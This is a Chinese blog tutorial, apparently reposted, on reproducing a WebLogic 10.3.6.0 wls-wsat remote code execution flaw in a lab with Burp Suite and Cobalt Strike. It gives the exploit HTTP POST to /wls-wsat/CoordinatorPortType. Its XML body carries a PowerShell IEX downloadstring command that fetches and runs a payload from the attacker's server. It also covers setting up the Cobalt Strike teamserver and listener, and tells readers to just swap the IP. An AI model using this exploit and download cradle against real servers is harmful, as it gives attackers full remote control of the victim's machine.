关于weblogic 10.3.6.0 的漏洞复现(2)

今天小R又学会了一个工具的使用,而且这个工具很强大很强大。 待会介绍。

一、需要的试验环境:

一台宿主机,虚拟机(kali+window2008或其他版本的windows)  
1.宿主机需要的工具:BT(burpsuite)

2.虚拟机kali:CobaltStrike 工具(我用的是3.8版本),由于这个工具容易被百度云和谐我就步发百度云链接了。可以找我要:QQ1356187559

3.windows server2008  :搭建一个weblogic环境(这里就不介绍搭建了,网上有)

二、实验说明

此实验不仅仅局限于内网,外网也可以,但是外网必须得要有一个服务器。否则是不可以实现的。由于没有购买服务器,所以用内网测。把宿主机当做攻击机,kali作为攻击者的服务器, window server2008则为靶机。
在这里:

攻击机IP:192.168.2.5

服务器kali IP:192.168.2.7

靶机windwos server 2008 IP :192.168.2.11

 

三、操作步骤。

1. 用攻击机IP访问靶机的weblogic看看weblogic是否能够正常运行。 

 

2. 能够正常运行之后,就开始用kali里面的工具了。解压后进入然后在终端里打开

关于weblogic 10.3.6.0 的漏洞复现(2)_第1张图片

 

3.运行打开teamserver发现提示以下信息,得输入 本机的host(不是127.0.0.1,是192.168.2.7),密码随意设(要记住)。  PS: 这里得讲一下,小R在第一次运行这个teamserver这个程序的时候,出现权限不够这一句话,若有

有雷同的情况,可以用这条   chomd a+x ./teamserver   命令来修改权限,sudo是不可以的。    

关于weblogic 10.3.6.0 的漏洞复现(2)_第2张图片

 

4.运行后,这个终端不要关闭,打开另外一个终端,运行  ./cobaltstrike 除了填入密码以外,其它的可以不用变,端口随便。这里选择默认

关于weblogic 10.3.6.0 的漏洞复现(2)_第3张图片

 

5. 点击如图所示的按钮,URL Path 随便你写,端口也随便。然后点击Launch。  复制这段代码。

关于weblogic 10.3.6.0 的漏洞复现(2)_第4张图片

关于weblogic 10.3.6.0 的漏洞复现(2)_第5张图片

 

6. 打开宿主机的Burpsuite。抓取该 网址的包 http://192.168.2.11:7001/wls-wsat/CoordinatorPortType后,利用Burpsuite来修改包发出去。 这里注意得是POST请求,默认的是get,得改过来,除此之外,还得添加Content-Type: text/xml  这句话。

POC发给你们。

 

 关于weblogic 10.3.6.0 的漏洞复现(2)_第6张图片

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.2.11:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: SL_G_WPT_TO=zh; SL_GWPT_Show_Hide_tmp=1; SL_wptGlobTipTmp=1
Connection: close
Content-Length: 1130








powershell.exe


IEX


((new-object


net.webclient).downloadstring('http://192.168.2.7:5555/R'))








 

 

好了好了,现在来分析一下这段代码。有没有发现前面利用     powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.2.7:5555/R.Hacker'))"

在这里我是分开写的,因为weblogic不能识别空格,所以就利用这个分段的模式来解决。  至于 -nop  -w  hidden -c 为啥没有我就不解释了,反正没用。

各位做的时候主要也就是改下ip就行了。 

7.  发出去以后,在windows 2008 server 中打开任务管理器。你就会在发现一个powershell的漏洞  

 关于weblogic 10.3.6.0 的漏洞复现(2)_第7张图片

8.注入代码成功,再回头看看 kali里面的工具吧。打开监听功能。根据如图情况填写。

关于weblogic 10.3.6.0 的漏洞复现(2)_第8张图片

关于weblogic 10.3.6.0 的漏洞复现(2)_第9张图片

9.然后看如图,成功上线。  上线了以后能干什么吗???   你跟我讲能干什么???   他什么都能干,这里就不介绍,网上有教程。 小R有点累。 不懂就加QQ问我吧

 

 关于weblogic 10.3.6.0 的漏洞复现(2)_第10张图片

 

转载于:https://www.cnblogs.com/R-Hacker/p/9014918.html

你可能感兴趣的:(关于weblogic 10.3.6.0 的漏洞复现(2))